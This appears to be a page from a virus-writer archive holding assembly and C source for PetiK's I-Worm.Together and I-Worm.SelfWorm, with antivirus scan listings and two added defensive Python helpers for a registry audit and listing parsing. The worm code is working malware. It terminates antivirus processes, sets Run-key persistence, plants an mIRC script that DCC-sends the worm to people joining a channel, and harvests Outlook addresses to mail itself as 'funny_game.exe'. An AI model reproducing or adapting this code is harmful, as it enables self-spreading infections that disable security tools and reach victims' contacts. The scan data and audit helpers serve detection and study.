mess->lpRecips->ulRecipClass=MAPI_TO;
mess->lpRecips->lpszName=mname;
mess->lpRecips->lpszAddress=maddr;
mess->nFileCount=1;
mess->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mess->lpFiles, 0, sizeof(MapiFileDesc));
mess->lpFiles->ulReserved=0;
mess->lpFiles->flFlags=NULL;
mess->lpFiles->nPosition=-1;
mess->lpFiles->lpszPathName=filename;
mess->lpFiles->lpszFileName=attname[GetTickCount()&6];
mess->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mess, NULL, NULL);
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mess->lpFiles);
mFreeBuffer(mess);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
}
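LiTeLo above installs itself with a Run value whose command ends in " -i", registers an entry under Uninstall\LiteLo whose UninstallString is the same binary with " -u", and Wolf and Doublet earlier on this page write Level=1 and AccessVBOM=1 under HKCU\Software\Microsoft\Office\<version>\Word\Security. The Python below is an added audit, not code from this archive, that reads a .reg export and flags both patterns: an Uninstall entry whose command is one of the autorun binaries, and Word security values set to Low or trusting VBA project access. The export is constructed for the example and the parser covers only string and dword values; the Level meanings (1 Low, 2 Medium, 3 High) are those of Word 2000/2002, the versions these macro viruses target.

```python
import re

# Constructed .reg-style export (plain text here; regedit writes UTF-16) with
# the values LiTeLo and the Word macro viruses on this page write, plus one
# ordinary autorun entry as a control.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Flash32"="C:\\WINDOWS\\SYSTEM32\\Flash32.exe -i"
"ctfmon"="C:\\WINDOWS\\system32\\ctfmon.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\LiteLo]
"DisplayName"="Flash32 Uninstall"
"UninstallString"="C:\\WINDOWS\\SYSTEM32\\Flash32.exe -u"

[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]
"Level"=dword:00000001
"AccessVBOM"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000003
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')
EXE_RE = re.compile(r'^(?:"([^"]+)"|(\S+?\.exe))\s*(.*)$', re.IGNORECASE)
WORD_SECURITY_RE = re.compile(
    r"\\Software\\Microsoft\\Office\\(\d+\.\d+)\\Word\\Security$", re.IGNORECASE)
LEVEL_NAMES = {1: "Low", 2: "Medium", 3: "High"}  # Word 2000/2002 values


def parse_reg(text):
    """Parse the .reg subset used here: [key] headers, "name"="string" with
    backslash escapes, and "name"=dword:hex. Other value types are skipped."""
    reg, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            reg.setdefault(key, {})
            continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            continue
        name, rhs = m.groups()
        if rhs.startswith("dword:"):
            reg[key][name] = int(rhs[6:], 16)
        elif len(rhs) >= 2 and rhs.startswith('"') and rhs.endswith('"'):
            reg[key][name] = rhs[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return reg


def split_command(cmd):
    """Split a Run or UninstallString command into (executable, arguments)."""
    m = EXE_RE.match(cmd.strip())
    if not m:
        return cmd.strip(), ""
    return (m.group(1) or m.group(2)), m.group(3).strip()


def autorun_uninstall_overlap(reg):
    """Flag Uninstall entries whose UninstallString is an autorun binary: the
    program 'uninstalls' itself, which is what LiTeLo's -i/-u switches set up."""
    autoruns = {}
    for key, values in reg.items():
        if key.lower().endswith("\\currentversion\\run"):
            for name, cmd in values.items():
                if isinstance(cmd, str):
                    autoruns[split_command(cmd)[0].lower()] = name
    findings = []
    for key, values in reg.items():
        cmd = values.get("UninstallString")
        if "\\currentversion\\uninstall\\" not in key.lower() or not isinstance(cmd, str):
            continue
        exe, args = split_command(cmd)
        if exe.lower() in autoruns:
            findings.append({"uninstall_key": key, "run_value": autoruns[exe.lower()],
                             "executable": exe, "uninstall_args": args,
                             "display_name": values.get("DisplayName")})
    return findings


def weak_word_macro_security(reg):
    """Flag the two values Wolf and Doublet write: Level=1 removes the macro
    prompt, AccessVBOM=1 lets VBA import modules into other projects."""
    findings = []
    for key, values in reg.items():
        m = WORD_SECURITY_RE.search(key)
        if not m:
            continue
        level = values.get("Level")
        if isinstance(level, int) and level < 2:
            findings.append({"office": m.group(1), "setting": "Level", "value": level,
                             "meaning": f"{LEVEL_NAMES.get(level, level)}: macros run without a prompt"})
        if values.get("AccessVBOM") == 1:
            findings.append({"office": m.group(1), "setting": "AccessVBOM", "value": 1,
                             "meaning": "trust access to the VBA project object model is on"})
    return findings


if __name__ == "__main__":
    reg = parse_reg(SAMPLE_REG)
    for finding in autorun_uninstall_overlap(reg) + weak_word_macro_security(reg):
        print(finding)
```

On a live machine the same checks apply to an export taken with reg export of the Run and Uninstall keys and of each Office version's Word\Security key; the overlap check is deliberately keyed on the executable path rather than the value name, because the value name ("Flash32") and the uninstall key name ("LiteLo") are chosen by the worm and carry no signal.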
File Litelo.exe received on 05.16.2009 17:51:36 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Backdoor.Win32.Hackarmy!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Litelo.worm.28672
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.Flash.1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Petik.G
Avast 4.8.1335.0 2009.05.15 Win32:Trojan-gen {Other}
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.F@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Petik
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.59904
eSafe 7.0.17.0 2009.05.14 Win32.Petik
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.28672.B
F-Prot 4.4.4.56 2009.05.16 W32/Petik.G
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik!worm
GData 19 2009.05.16 Win32.Petik.F@mm
Ikarus T3.1.1.49.0 2009.05.16 Backdoor.Win32.Hackarmy
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick.ab.gen
McAfee+Artemis 5616 2009.05.15 W32/PetTick.ab.gen
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.Flash.1
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick@mm
NOD32 4080 2009.05.15 Win32/Petik
Norman 6.01.05 2009.05.16 W32/Pet_Tick.28672.A
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.28672
Panda 10.0.0.14 2009.05.16 Worm Generic.LC
PCTools 4.4.2.0 2009.05.16 I-Worm.Petllo
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Litelo
Sophos 4.41.0 2009.05.16 W32/Petik-Q
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 Trojan/Hami
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.A
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Litelo
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petllo

Additional information
File size: 28672 bytes
MD5...: 4292a1ade77cb9e51e3de52101c99dcb
SHA1..: b485fdd64fda5d12221f83be8c062588f051b2c6
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
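The five scan listings on this page (WarGames.exe, Linda.htm, Wolf.doc, Doublet.vbs, Litelo.exe) show how little vendor naming agrees even on a sample that is seven years old: WarGame, WarGames, Wargam, Warga and Pet_Tick all name the same file, and several engines report only a generic verdict. The Python below is an added helper, not anything from this archive, that parses a listing in this flattened "vendor version date result" layout, recovers the size and hashes, computes the detection ratio, lists engines that reported nothing, and clusters family names. The embedded sample is a constructed subset of the WarGames.exe rows above; the generic-token list and the five-character prefix clustering are this example's own heuristics.

```python
import re
from collections import Counter

# Constructed excerpt: a subset of the WarGames.exe rows from the listings on
# this page, in the same whitespace-separated "vendor version date result"
# layout the scan service produced; "-" means the engine reported nothing.
SAMPLE_LISTING = """\
File WarGames.exe received on 05.16.2009 19:57:59 (CET)

Antivirus Version Last Update Result
AntiVir 7.9.0.168 2009.05.15 Worm/WarGame.1
BitDefender 7.2 2009.05.16 Win32.WarGames.A@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Wargam
ClamAV 0.94.1 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Wargam
McAfee+Artemis 5616 2009.05.15 W32/Warga@MM
NOD32 4080 2009.05.15 Win32/Warga.A
Norman 6.01.05 2009.05.16 W32/Pet_Tick.77824.A
Prevx 3.0 2009.05.16 High Risk Worm
Symantec 1.4.4.12 2009.05.16 W32.Wargam.Worm

Additional information
File size: 77824 bytes
MD5...: f3f60781ccd4c9c429a1431f0162a295
SHA1..: d6ff0b428178a9898f1552a0d18e59b48686cb67
"""

HEADER_RE = re.compile(r"^File (\S+) received on (.+)$")
ROW_RE = re.compile(r"^(\S+) (\S+) (\d{4}\.\d{2}\.\d{2}) (.+)$")

# Name parts that describe platform, type or confidence, never the family.
GENERIC = {
    "win32", "w32", "w95", "w97m", "w2000m", "w2km", "wm", "wm97", "mw97",
    "vbs", "js", "html", "macro", "msword", "worm", "email", "i", "virus",
    "trojan", "backdoor", "generic", "gen", "mm", "v", "ik", "probably",
    "unknown", "script", "high", "medium", "risk", "malware", "hllw", "hllm",
    "family", "variant", "of", "a", "other", "src",
}


def parse_listing(text):
    """Turn one flattened scan listing into file facts plus one dict per engine."""
    report = {"file": None, "received": None, "rows": [],
              "size": None, "md5": None, "sha1": None}
    for line in text.splitlines():
        line = line.strip()
        m = HEADER_RE.match(line)
        if m:
            report["file"], report["received"] = m.groups()
            continue
        m = ROW_RE.match(line)
        if m:
            vendor, version, date, result = m.groups()
            report["rows"].append({"vendor": vendor, "version": version, "date": date,
                                   "result": None if result == "-" else result})
            continue
        if line.startswith("File size:"):
            report["size"] = int(line.split()[2])
        elif line.startswith("MD5"):
            report["md5"] = line.split(":", 1)[1].strip().lower()
        elif line.startswith("SHA1"):
            report["sha1"] = line.split(":", 1)[1].strip().lower()
    return report


def detection_ratio(report):
    """(engines that reported something, engines in the listing)."""
    detected = sum(1 for r in report["rows"] if r["result"] is not None)
    return detected, len(report["rows"])


def vendors_without_detection(report):
    return [r["vendor"] for r in report["rows"] if r["result"] is None]


def family_guess(result):
    """First token of a detection name that is not a platform/type/confidence word."""
    if result is None:
        return None
    for tok in re.split(r"[^A-Za-z0-9_]+", result):
        if tok and not tok.isdigit() and len(tok) > 1 and tok.lower() not in GENERIC:
            return tok
    return None


def family_clusters(report, prefix=5):
    """Count engines per family, folding spellings such as WarGame, WarGames,
    Wargam and Warga together by a short case-folded prefix."""
    counts = Counter()
    for r in report["rows"]:
        fam = family_guess(r["result"])
        if fam:
            counts[fam.lower().replace("_", "")[:prefix]] += 1
    return counts


if __name__ == "__main__":
    rep = parse_listing(SAMPLE_LISTING)
    print(rep["file"], rep["md5"], "%d/%d" % detection_ratio(rep))
    print(dict(family_clusters(rep)), "no detection:", vendors_without_detection(rep))
```

The ratio counts a purely heuristic verdict ("High Risk Worm") as a detection, which is how aggregated scan services count it too; the family clustering is where that verdict drops out, because none of its tokens names a family. The prefix length is a trade-off: five characters merge the four spellings of this family but would also merge two unrelated names that share a prefix, so treat the clusters as a triage view, not as ground truth.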
comment #
Name : I-Worm.Together
Author : PetiK
Date : March 10th 2002 - March 15th 2002
#

.586p
.model flat
.code

JUMPS

api macro a
extrn a:proc
call a
endm

PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ?
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile db 260 dup(?)
PROCESSENTRY32 ENDS

include Useful.inc

start_worm: call hide_worm

twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA ; esi = name of file

push 50
push offset verif_worm
api GetSystemDirectoryA
@pushsz "\EBASE64.EXE"
push offset verif_worm
api lstrcat

mov edi,offset copy_worm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,"aBe\"
stosd
mov eax,"46es"
stosd
mov eax,"exe."
stosd
pop edi ; edi = %system%\eBase64.exe

push offset orig_worm
push offset verif_worm
api lstrcmp
test eax,eax
jz continue_worm

push 0
push edi
push esi
api CopyFileA ; copy file

push 20
push edi
push 1
@pushsz "Encode Base64"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA ; regedit

jmp end_worm

continue_worm:

fuck_antivirus:
@pushsz "OIFIL400.DLL"
api LoadLibraryA
test eax,eax
jz end_fuck_antivirus

push 0
push 2
api CreateToolhelp32Snapshot

mov lSnapshot, eax

inc eax
jz end_fuck_antivirus

lea eax,uProcess
mov [eax.dwSize], SIZE PROCESSENTRY32

lea eax,uProcess
push eax
push lSnapshot
api Process32First
checkfile:
test eax, eax
jz InfExpRetCl
push ecx

mov eax,ProcessID
push offset uProcess
cmp eax,[uProcess.th32ProcessID]
je NextFile

lea ebx,[uProcess.szExeFile]

verif macro verifname,empty
local name
ifnb <empty>
%out too much arguments in macro 'nxt_instr'
.err
endif
call name
db verifname,0
name:
push ebx
api lstrstr
test eax,eax
endm

verif "ARG" ; Norton
jnz term
verif "AVP32.EXE" ; AVP
jnz term
verif "AVPCC.EXE" ; AVP
jnz term
verif "AVPM.EXE" ; AVP
jnz term
verif "WFINDV32.EXE"
jnz term
verif "F-AGNT95.EXE" ; F-SECURE
jnz term
verif "NAVAPW32.EXE" ; Norton
jnz term
verif "NAVW32.EXE" ; Norton
jnz term
verif "NMAIN.EXE"
jnz term
verif "PAVSHED.EXE" ; PandaSoftware
jnz term
verif "vshwin32.exe" ; McAfee
jnz term
verif "PETIKSHOW.EXE" ; McAfee
jnz term

@pushsz "ZONEALARM.EXE"
push ebx
api lstrstr
test eax,eax
jz NextFile
term: push [uProcess.th32ProcessID]
push 1
push 001F0FFFh
api OpenProcess
test eax,eax
jz NextFile
push 0
push eax
api TerminateProcess

push ebx
push offset new_name
api lstrcpy
mov esi,offset new_name
push esi
api lstrlen
add esi,eax
sub esi,4
mov [esi],"ktp."
lodsd
; mov [esi],"kmz."
; lodsd

push 0
push offset new_name
push ebx
api CopyFileA
push ebx
api DeleteFileA

NextFile:
push offset uProcess
push lSnapshot
api Process32Next
jmp checkfile

InfExpRetCl:
push lSnapshot
api CloseHandle
end_fuck_antivirus:

call Spread_Mirc
call Spread_Worm
e_s_w:
end_worm:
push 0
api ExitProcess

hide_worm Proc
pushad
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
Spread_Mirc Proc
push offset copy_worm
push offset mirc_exe
api lstrcpy
call @mirc
db "C:\mirc\script.ini",0
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
db "C:\progra~1\mirc\script.ini",0
db "C:\progra~1\mirc32\script.ini",0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
push ebp
api WriteFile
push ebp
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
ret
Spread_Mirc EndP

Spread_Worm Proc
pushad
push 50
push offset vbs_worm
api GetSystemDirectoryA
@pushsz "\eBase.vbs"
push offset vbs_worm
api lstrcat
push 0
push 20h
push 2
push 0
push 1
push 40000000h
push offset vbs_worm
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_vbs - s_vbs
push offset s_vbs
push ebp
api WriteFile
push ebp
api CloseHandle
push 1
push 0
push 0
push offset vbs_worm
@pushsz "open"
push 0
api ShellExecuteA

verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet

push 50
push offset t_ini
api GetSystemDirectoryA
@pushsz "\together.ini"
push offset t_ini
api lstrcat

push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset t_ini
api CreateFileA
inc eax
je end_spread_worm
dec eax
xchg eax,ebx

xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
api CreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp

xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi

push 0
push ebx
api GetFileSize
cmp eax,4
jbe end_s3

scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:

end_s3: push esi
api UnmapViewOfFile
end_s2: push ebp
api CloseHandle
end_s1: push ebx
api CloseHandle

end_spread_worm:
popad
jmp e_s_w
Spread_Worm EndP

send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret

.data
; === Copy Worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
verif_worm db 50 dup (0)
sysTime db 16 dup(0)

; === Fuck AntiVirus ===
uProcess PROCESSENTRY32 <?>
ProcessID dd ?
lSnapshot dd ?
new_name db 100 dup (?)

; === Spread With mIrc ===
s_mirc: db "[script]",CRLF
db ";Don't edit this file.",CRLF,CRLF
db "n0=on 1:JOIN:{",CRLF
db "n1= /if ( $nick == $me ) { halt }",CRLF
db "n2= /.dcc send $nick "
mirc_exe db 50 dup (?)
db CRLF,"n3=}",0
e_mirc:
byte_write dd ?
; === Spread with Outlook ===
vbs_worm db 50 dup (0)
t_ini db 50 dup (0)
mail_addr db 128 dup (?)
inet dd 0
sess dd 0

subject db "Re: Answer",0
body db "Here for you...",0
filename db "funny_game.exe",0

Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?

MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?

Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?

s_vbs:
db 'On Error Resume Next',CRLF
db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set sys=fs.GetSpecialFolder(1)',CRLF
db 'Set c=fs.CreateTextFile(sys&"\together.ini")',CRLF
db 'c.Close',CRLF
db 'Set ou=CreateObject("Outlook.Application")',CRLF
db 'Set map=ou.GetNameSpace("MAPI")',CRLF
db 'adr=""',CRLF
db 'For Each mel in map.AddressLists',CRLF
db 'If mel.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mel.AddressEntries.Count',CRLF
db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'adr=adr &";#"',CRLF,CRLF
db 'Set c=fs.OpenTextFile(sys&"\together.ini",2)',CRLF
db 'c.WriteLine adr',CRLF
db 'c.Close',CRLF
e_vbs:

signature db "I-Worm.Together "
author db "Coded by PetiK - 2002",00h

end start_worm
end
File Together.exe received on 05.16.2009 19:41:01 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.worm.5120
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.FunGame
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!e382
Avast 4.8.1335.0 2009.05.15 Win32:PetikTogether
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.SIMPPkg.5A573F5C
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.16 Worm.Petik-2
Comodo 1157 2009.05.08 Worm.Win32.Petik
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Win32.Pet_Tick.AC
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.5120.B
F-Prot 4.4.4.56 2009.05.16 W32/Malware!e382
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik.M@mm
GData 19 2009.05.16 Generic.Malware.SIMPPkg.5A573F5C
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 Artemis!91703278352E
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.FunGame
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick@mm
NOD32 4080 2009.05.15 Win32/Petik
Norman 6.01.05 2009.05.16 W32/Petik.D@mm
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 Worm Generic
PCTools 4.4.2.0 2009.05.16 I-Worm.Pettog.A
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Together
Sophos 4.41.0 2009.05.16 W32/Petik-R
Sunbelt 3.2.1858.2 2009.05.16 W32.Pet_Tick.AC@mm
Symantec 1.4.4.12 2009.05.16 W32.Pet_Tick.AC@mm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.M
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Together
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Pettog.A

Additional information
File size: 5120 bytes
MD5...: 91703278352e9e18d01d081c73330ec2
SHA1..: 81366149cda1578b5dc71b4c4860f9555467e1a4
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
/*
Start : April 1st 2002
Name : I-Worm.SelfWorm
Coder : PetiK
Language : C

*/

#include <windows.h>
#include <stdio.h>
#include <mapi.h>
#include <tlhelp32.h>
#include <winver.h>
#include "SelfWorm.h"

#if defined (win32)
#define IS_WIN32 TRUE
#else
#define IS_WIN32 FALSE
#endif
HINSTANCE hInst; // Current instance.

LPCTSTR lpszAppName = "SelfWorm";
LPCTSTR lpszTitle = "SelfWorm 1.0";

char filename[100],cpywrm[100],copy2[100],start[100];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
LPTSTR cmdLine,ptr;
BOOL installed,rProcessFound;
HANDLE fd,lSnapshot,myproc;
BYTE desktop[50],favoris[50],personal[50],cache[50],startup[100];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),sizstartup=sizeof(startup);
DWORD type=REG_SZ;
FILE *vbsworm;

LHANDLE session;
MapiMessage mess;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;

HKEY hReg;
PROCESSENTRY32 uProcess;

void mirc(char *);
void StopAV(char *);

ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);

BOOL RegisterWin95(CONST WNDCLASS* lpwc);

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
MSG msg;
HWND hWnd;
WNDCLASS wc;

RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegQueryValueEx(hReg,"Startup",0,&type,startup,&sizstartup);
RegCloseKey(hReg);

GetModuleFileName(hInstance,filename,100);
GetSystemDirectory((char *)cpywrm,100);
strcat(cpywrm,"\\ShellW32.exe");
CopyFile(filename,cpywrm,0);

strcpy(copy2,cpywrm);
strcat(copy2," -i");

RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Shell32",0,REG_SZ,(BYTE *)copy2,100);
RegCloseKey(hReg);

installed=FALSE;
cmdLine=GetCommandLine();
if(cmdLine) {
for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
}
}
}

hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI,"MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI,"MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI,"MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI,"MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI,"MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI,"MAPIFreeBuffer");

if(!installed) {

wc.style = CS_HREDRAW | CS_VREDRAW;
wc.lpfnWndProc = (WNDPROC)WndProc;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = 0;
wc.hIcon = LoadIcon(hInstance, lpszAppName);
wc.hCursor = LoadCursor(NULL, IDC_ARROW);
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wc.lpszMenuName = lpszAppName;
wc.lpszClassName = lpszAppName;

if(!RegisterWin95(&wc))
return FALSE;
hInst = hInstance;
hWnd = CreateWindow (lpszAppName,
lpszTitle,
WS_OVERLAPPEDWINDOW|WS_MAXIMIZEBOX,
150,150,300,200,NULL,NULL,hInstance,NULL);
if(!hWnd)
return FALSE;
; ShowWindow(hWnd, nCmdShow);
ShowWindow(hWnd,SW_SHOWNORMAL);
UpdateWindow(hWnd);
while(GetMessage(&msg, NULL, 0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return(msg.wParam);

}
else
{
MessageBox(NULL,"SelfWorm actif","SelfWorm",MB_OK|MB_ICONINFORMATION);
FreeLibrary(hMAPI);
}

}
BOOL RegisterWin95(CONST WNDCLASS* lpwc)
{
WNDCLASSEX wcex;

wcex.style = lpwc->style;
wcex.lpfnWndProc = lpwc->lpfnWndProc;
wcex.cbClsExtra = lpwc->cbClsExtra;
wcex.cbWndExtra = lpwc->cbWndExtra;
wcex.hInstance = lpwc->hInstance;
wcex.hIcon = lpwc->hIcon;
wcex.hCursor = lpwc->hCursor;
wcex.hbrBackground = lpwc->hbrBackground;
wcex.lpszMenuName = lpwc->lpszMenuName;
wcex.lpszClassName = lpwc->lpszClassName;
wcex.cbSize = sizeof(WNDCLASSEX);
wcex.hIconSm = LoadIcon(wcex.hInstance, "TDW");
return RegisterClassEx(&wcex);
}
LRESULT CALLBACK WndProc( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
static HWND hEdit = NULL;
switch(uMsg)
{
case WM_INITDIALOG:
hEdit=CreateWindow( "BUTTON", "ABOUT",WS_CHILD | WS_VISIBLE |
BS_PUSHBUTTON,0,0,290,190,hWnd,(HMENU)IDM_ABOUT,hInst,NULL );
break;
case WM_COMMAND:
switch(LOWORD(wParam))
{
case IDM_ABOUT:
MessageBox(NULL,"Written by PetiK. (c)2002","I-Worm.SelfWorm",
MB_OK|MB_ICONINFORMATION);
break;
case IDM_MIRC:
mirc("C:\\mirc\\script.ini");
mirc("C:\\mirc32\\script.ini");
mirc("C:\\Program Files\\mirc\\script.ini");
mirc("C:\\Program Files\\mirc32\\script.ini");
